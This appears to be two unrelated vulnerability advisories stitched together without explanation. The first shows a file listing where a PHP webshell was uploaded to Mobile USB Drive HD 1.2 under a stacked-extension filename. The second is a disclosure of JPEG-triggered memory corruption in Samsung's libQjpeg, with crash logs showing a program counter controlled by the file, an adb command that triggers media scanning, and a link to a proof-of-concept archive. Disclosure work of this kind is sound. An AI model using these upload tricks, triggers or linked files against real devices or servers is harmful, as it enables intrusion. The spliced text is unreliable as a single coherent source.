Mobile USB Drive HD 1.2 is vulnerable; other versions may also be affected. The file listing below shows an uploaded file named webshell-js.php.png.txt.iso.php.gif, that is, a PHP webshell accepted under a stacked-extension filename:
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href=_http://www.example.com/files/webshell-js.php.png.txt.iso.php.gif;
class="file">webshell-js.php.png.txt.iso.php.gif</a></td>
Source: https://code.google.com/p/google-security-research/issues/detail?id=495
The attached JPEG files cause memory corruption in the DCMProvider service when they are processed by the media scanner, leading to the following crashes:
quaramip.jpg:
I/DEBUG ( 2962): pid: 19350, tid: 19468, name: HEAVY#0 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 2962): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x8080808080808080
I/DEBUG ( 2962): x0 0000007f97afd000 x1 0000007f98118650 x2 0000007f9811eaa8 x3 0000007f9815a430
I/DEBUG ( 2962): x4 8080808080808080 x5 0000007f9811eaa8 x6 0000000000000000 x7 0000000000000003
I/DEBUG ( 2962): x8 0000000000000050 x9 0000000000000005 x10 0000000000000053 x11 0000007f9815a470
I/DEBUG ( 2962): x12 0000007f97803920 x13 0000007f978ff050 x14 0000007f983fea40 x15 0000000000000001
I/DEBUG ( 2962): x16 0000007faabefae0 x17 0000007faf708880 x18 0000007faf77da40 x19 0000007f97afd000
I/DEBUG ( 2962): x20 00000000ffffffff x21 0000000000000001 x22 0000007f9815a410 x23 0000007f981588f0
I/DEBUG ( 2962): x24 0000007f983feb44 x25 0000007f983feb48 x26 ffffffffffffffe8 x27 0000007f98118600
I/DEBUG ( 2962): x28 0000007f98177800 x29 000000000000001c x30 0000007faabb8ff8
I/DEBUG ( 2962): sp 0000007f983fea50 pc 8080808080808080 pstate 0000000000000000
I/DEBUG ( 2962):
I/DEBUG ( 2962): backtrace:
I/DEBUG ( 2962): #00 pc 8080808080808080 <unknown>
I/DEBUG ( 2962): #01 pc 00000000000000a6 <unknown>
quaramfree.jpg:
I/DEBUG ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x808080808000d0
I/DEBUG ( 2956): x0 0000000000008080 x1 0000007f89d03720 x2 00000000000fffff x3 8080808080800000
I/DEBUG ( 2956): x4 0000000000000008 x5 0000007f89cf2000 x6 0000007f89d03758 x7 0000000000000002
I/DEBUG ( 2956): x8 0000000000000006 x9 0000000000000012 x10 8080808080800090 x11 0000007f803015d8
I/DEBUG ( 2956): x12 0000000000000013 x13 0000007f89cf2000 x14 0000007f89d00000 x15 00000000000014a4
I/DEBUG ( 2956): x16 0000007f850eec00 x17 0000007f89c4e17c x18 0000007f89d037f8 x19 8080808080808080
I/DEBUG ( 2956): x20 0000007f8031e618 x21 0000007f89cf2000 x22 0000000000000001 x23 0000007f803166d8
I/DEBUG ( 2956): x24 0000007f80331170 x25 0000000000000010 x26 00000000000001f4 x27 fffffffffffffffc
I/DEBUG ( 2956): x28 000000000000007d x29 0000007f84efea60 x30 0000007f89c4e194
I/DEBUG ( 2956): sp 0000007f84efea60 pc 0000007f89cae0b4 pstate 0000000020000000
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 00000000000790b4 /system/lib64/libc.so (je_free+92)
I/DEBUG ( 2956): #01 pc 0000000000019190 /system/lib64/libc.so (free+20)
I/DEBUG ( 2956): #02 pc 000000000003e8a0 /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+1076)
I/DEBUG ( 2956): #03 pc 00000000000427b0 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2904)
I/DEBUG ( 2956): #04 pc 00000000000428d4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 2956): #05 pc 0000000000042a08 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG ( 2956): #06 pc 000000000004420c /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG ( 2956): #07 pc 00000000000a4234 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 2956): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 2956): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG ( 2956): #10 pc 00000000000018ec /system/framework/arm64/saiv.odex
In the first crash the pc register is set to a value taken from the content of the JPEG file (0x8080808080808080), and in the second crash free() operates on a pointer with the same pattern, indicating that this issue could probably be exploited to achieve code execution. We believe the issue is caused by a flaw in libQjpeg.so (the third-party Quram Qjpeg library).
To reproduce the issue, download the file and wait for media scanning to occur, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38614.zip